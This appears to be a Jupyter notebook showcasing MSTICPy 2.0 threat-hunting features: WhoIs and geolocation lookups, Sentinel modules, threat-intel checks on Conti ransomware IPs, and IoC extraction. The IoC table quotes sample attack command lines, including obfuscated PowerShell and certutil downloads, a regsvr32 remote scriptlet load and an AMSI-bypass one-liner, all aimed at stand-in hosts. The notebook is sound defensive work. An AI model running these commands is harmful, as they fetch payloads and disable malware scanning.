{ "cells": [ { "cell_type": "markdown", "metadata": {}, "source": [ "# What's new in MSTICPy 2.0?\n", "\n", "- Project reorganization\n", "- Import simplification:\n", " - mp.attributes\n", " - init_notebook imports - Entities & Pivots\n", " - pandas accessors\n", "- Time Series pandas accessors\n", "- Threat Intel Lookup Async\n", "- DataFrame to Graph\n", "- Folium map\n", "- Sentinel Workspace configuration\n", "- Pivoting and Data Providers\n", "\n", "\n", "## V2.0.0 Docs available online\n", "https://msticpy.readthedocs.io/en/release-msticpy-v2.0.0/" ] }, { "cell_type": "markdown", "metadata": {}, "source": [ "## Imports simplified\n", "\n", "New \"house style\" - shortening msticpy to \"mp\"\n" ] }, { "cell_type": "code", "execution_count": 86, "metadata": {}, "outputs": [ { "data": { "text/plain": [ "True" ] }, "execution_count": 86, "metadata": {}, "output_type": "execute_result" } ], "source": [ "import msticpy as mp\n", "\n", "mp.init_notebook()" ] }, { "cell_type": "code", "execution_count": null, "metadata": {}, "outputs": [], "source": [] }, { "cell_type": "markdown", "metadata": {}, "source": [ "Many classes and functions are available directly from \"mp\"" ] }, { "cell_type": "code", "execution_count": 89, "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "Using Open PageRank. See https://www.domcop.com/openpagerank/what-is-openpagerank\n", "msticpy version installed: 2.0.0rc2 latest published: 1.8.2\n", "Latest version is installed.\n" ] }, { "data": { "text/html": [ "\n", " \n", "
Module | Help |
---|---|
msticpy.datamodel.soc.sentinel_alert | msticpy.datamodel.soc.sentinel_alert |
msticpy.context.azure.sentinel_utils | msticpy.context.azure.sentinel_utils |
msticpy.config.ce_azure_sentinel | msticpy.config.ce_azure_sentinel |
msticpy.context.azure.sentinel_incidents | msticpy.context.azure.sentinel_incidents |
msticpy.context.azure.sentinel_watchlists | msticpy.context.azure.sentinel_watchlists |
msticpy.context.azure.sentinel_core | msticpy.context.azure.sentinel_core |
msticpy.context.azure.sentinel_bookmarks | msticpy.context.azure.sentinel_bookmarks |
msticpy.context.azure.sentinel_workspaces | msticpy.context.azure.sentinel_workspaces |
msticpy.context.azure.sentinel_analytics | msticpy.context.azure.sentinel_analytics |
msticpy.context.azure.sentinel_search | msticpy.context.azure.sentinel_search |
\n", " | asn | \n", "asn_cidr | \n", "asn_country_code | \n", "asn_date | \n", "asn_description | \n", "asn_registry | \n", "nets | \n", "nir | \n", "query | \n", "raw | \n", "raw_referral | \n", "referral | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "1103 | \n", "145.1.0.0/17 | \n", "NL | \n", "1993-09-01 | \n", "SURFNET-NL SURFnet, The Netherlands, NL | \n", "ripencc | \n", "[{'cidr': '145.1.0.0/17', 'name': 'NIOZ-NET', 'handle': 'WP1948-RIPE', 'range': '145.1.0.0 - 145... | \n", "None | \n", "145.1.10.17 | \n", "None | \n", "None | \n", "None | \n", "
\n", " | CountryCode | \n", "CountryName | \n", "Longitude | \n", "Latitude | \n", "TimeGenerated | \n", "Type | \n", "IpAddress | \n", "
---|---|---|---|---|---|---|---|
0 | \n", "NL | \n", "Netherlands | \n", "4.8995 | \n", "52.3824 | \n", "2022-06-14 16:25:09.670081 | \n", "geolocation | \n", "145.1.10.17 | \n", "
\n", " | TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "Computer | \n", "SubjectUserSid | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectLogonId | \n", "NewProcessId | \n", "NewProcessName | \n", "TokenElevationType | \n", "ProcessId | \n", "CommandLine | \n", "ParentProcessName | \n", "TargetLogonId | \n", "SourceComputerId | \n", "TimeCreatedUtc | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:24.010 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0x1610 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "%%1936 | \n", "0x888 | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\MonitoringHost.exe | \n", "0x0 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:24.010 | \n", "
1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:24.023 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0x1790 | \n", "C:\\Windows\\System32\\conhost.exe | \n", "%%1936 | \n", "0x1610 | \n", "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "0x0 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:24.023 | \n", "
2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "WORKGROUP\\MSTICAlertsWin1$ | \n", "4688 | \n", "2019-01-15 05:24:25.807 | \n", "MSTICAlertsWin1 | \n", "S-1-5-18 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "0x3e7 | \n", "0xcd8 | \n", "C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe | \n", "%%1936 | \n", "0x280 | \n", "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding | \n", "C:\\Windows\\System32\\svchost.exe | \n", "0x3e4 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "2019-01-15 05:24:25.807 | \n", "
\n", " | IoCType | \n", "Observable | \n", "SourceIndex | \n", "Input | \n", "
---|---|---|---|---|
0 | \n", "url | \n", "http://server/file.sct | \n", "94 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
1 | \n", "dns | \n", "server | \n", "94 | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "
2 | \n", "url | \n", "https://blah/png','google.png')} | \n", "104 | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "
3 | \n", "dns | \n", "blah | \n", "104 | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "
4 | \n", "url | \n", "http://somedomain/best-kitten-names-1.jpg' | \n", "110 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
5 | \n", "dns | \n", "somedomain | \n", "110 | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "
6 | \n", "url | \n", "http://badguyserver/pwnme | \n", "125 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
7 | \n", "dns | \n", "badguyserver | \n", "125 | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "
8 | \n", "url | \n", "http://badguyserver/pwnme | \n", "130 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
9 | \n", "dns | \n", "badguyserver | \n", "130 | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "
10 | \n", "url | \n", "http://system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').se... | \n", "174 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
11 | \n", "dns | \n", "system.management.automation.amsiutils').getfield('amsiinitfailed','nonpublic,static').setvalue(... | \n", "174 | \n", ".\\powershell.exe -command [ref].assembly.gettype('http://system.management.automation.amsiutil... | \n", "
12 | \n", "ipv4 | \n", "1.2.3.4 | \n", "175 | \n", "netsh start capture=yes IPv4.Address=1.2.3.4 tracefile=C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\b... | \n", "
13 | \n", "ipv4 | \n", "127.0.0.1 | \n", "214 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
14 | \n", "url | \n", "http://127.0.0.1/ | \n", "214 | \n", "certutil -urlcache -split -f http://127.0.0.1/ | \n", "
\\n\"+\n \"\n", " | Ioc | \n", "IocType | \n", "SanitizedValue | \n", "QuerySubtype | \n", "Provider | \n", "Result | \n", "Severity | \n", "Details | \n", "RawResult | \n", "Reference | \n", "Status | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 45, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/162.244.80.235', 'reputation': 0, 'indicator': '162.244.... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/162.244.80.235/general | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 35, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/185.141.63.120', 'reputation': 0, 'indicator': '185.141.... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/185.141.63.120/general | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 36, 'names': ['Conti Ransomware | CISA', 'Conti Ransomware | CISA', 'IOCs for Co... | \n", "{'whois': 'http://whois.domaintools.com/82.118.21.1', 'reputation': 0, 'indicator': '82.118.21.1... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/82.118.21.1/general | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "OTX | \n", "True | \n", "high | \n", "{'pulse_count': 22, 'names': ['MS-ISAC: Joint Cybersecurity Advisory: Conti Ransomware', 'Conti ... | \n", "{'whois': 'http://whois.domaintools.com/85.93.88.165', 'reputation': 0, 'indicator': '85.93.88.1... | \n", "https://otx.alienvault.com/api/v1/indicators/IPv4/85.93.88.165/general | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 12, 'certificates': 12, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | \n", "{'summary': {'resolutions': 2, 'certificates': 6, 'malware_hashes': 1, 'projects': 0, 'articles'... | \n", "https://community.riskiq.com | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 13, 'certificates': 20, 'malware_hashes': 0, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "RiskIQ | \n", "True | \n", "high | \n", "{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "{'summary': {'resolutions': 24, 'certificates': 25, 'malware_hashes': 2, 'projects': 0, 'article... | \n", "https://community.riskiq.com | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "Tor | \n", "True | \n", "information | \n", "Not found. | \n", "None | \n", "https://check.torproject.org/exit-addresses | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 35, 'detected_urls': [... | \n", "{'asn': 19624, 'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-03 16:53... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 19, 'detected_urls': [... | \n", "{'undetected_urls': [], 'undetected_referrer_samples': [{'date': '2022-06-05 03:45:47', 'positiv... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 42, 'detected_urls': [... | \n", "{'asn': 204957, 'undetected_urls': [['http://bkgs0007.nov.com/', 'fe9ad6fcfd8214a3898853b5dec208... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "VirusTotal | \n", "True | \n", "high | \n", "{'verbose_msg': 'IP address in dataset', 'response_code': 1, 'positives': 7, 'detected_urls': ['... | \n", "{'asn': 8972, 'undetected_urls': [['https://bbb.edu-cisco.org/', '6adc598e2c5362b5f5facad921d0f0... | \n", "https://www.virustotal.com/vtapi/v2/ip-address/report | \n", "0 | \n", "
0 | \n", "162.244.80.235 | \n", "ipv4 | \n", "162.244.80.235 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/162.244.80.235 | \n", "401 | \n", "
1 | \n", "185.141.63.120 | \n", "ipv4 | \n", "185.141.63.120 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/185.141.63.120 | \n", "401 | \n", "
2 | \n", "82.118.21.1 | \n", "ipv4 | \n", "82.118.21.1 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/82.118.21.1 | \n", "401 | \n", "
3 | \n", "85.93.88.165 | \n", "ipv4 | \n", "85.93.88.165 | \n", "None | \n", "XForce | \n", "False | \n", "information | \n", "Authorization failed. Check account and key details. | \n", "<Response [401 Unauthorized]> | \n", "https://api.xforce.ibmcloud.com/ipr/85.93.88.165 | \n", "401 | \n", "
\\n\"+\n \"\n", " | AllExtIPs | \n", "CountryCode | \n", "CountryName | \n", "State | \n", "City | \n", "Longitude | \n", "Latitude | \n", "Asn | \n", "edges | \n", "Type | \n", "AdditionalData | \n", "IpAddress | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "65.55.44.109 | \n", "US | \n", "United States | \n", "Virginia | \n", "Boydton | \n", "-78.3750 | \n", "36.6534 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "65.55.44.109 | \n", "
1 | \n", "13.71.172.128 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.128 | \n", "
2 | \n", "13.71.172.130 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.130 | \n", "
3 | \n", "40.124.45.19 | \n", "US | \n", "United States | \n", "Texas | \n", "San Antonio | \n", "-98.4926 | \n", "29.4221 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "40.124.45.19 | \n", "
4 | \n", "104.43.212.12 | \n", "US | \n", "United States | \n", "Iowa | \n", "Des Moines | \n", "-93.6127 | \n", "41.6015 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "104.43.212.12 | \n", "
\n", " | AllExtIPs | \n", "CountryCode | \n", "CountryName | \n", "State | \n", "City | \n", "Longitude | \n", "Latitude | \n", "Asn | \n", "edges | \n", "Type | \n", "AdditionalData | \n", "IpAddress | \n", "Status | \n", "Friendliness | \n", "Flavor | \n", "SpiceLevel | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
0 | \n", "65.55.44.109 | \n", "US | \n", "United States | \n", "Virginia | \n", "Boydton | \n", "-78.3750 | \n", "36.6534 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "65.55.44.109 | \n", "Home | \n", "Warm | \n", "Chocolate | \n", "1.0 | \n", "
1 | \n", "13.71.172.128 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.128 | \n", "Office | \n", "Cold | \n", "Cinnamon | \n", "2.0 | \n", "
2 | \n", "13.71.172.130 | \n", "CA | \n", "Canada | \n", "Ontario | \n", "Toronto | \n", "-79.4195 | \n", "43.6644 | \n", "NaN | \n", "set() | \n", "geolocation | \n", "{} | \n", "13.71.172.130 | \n", "Vacation | \n", "Medium | \n", "Mango | \n", "3.0 | \n", "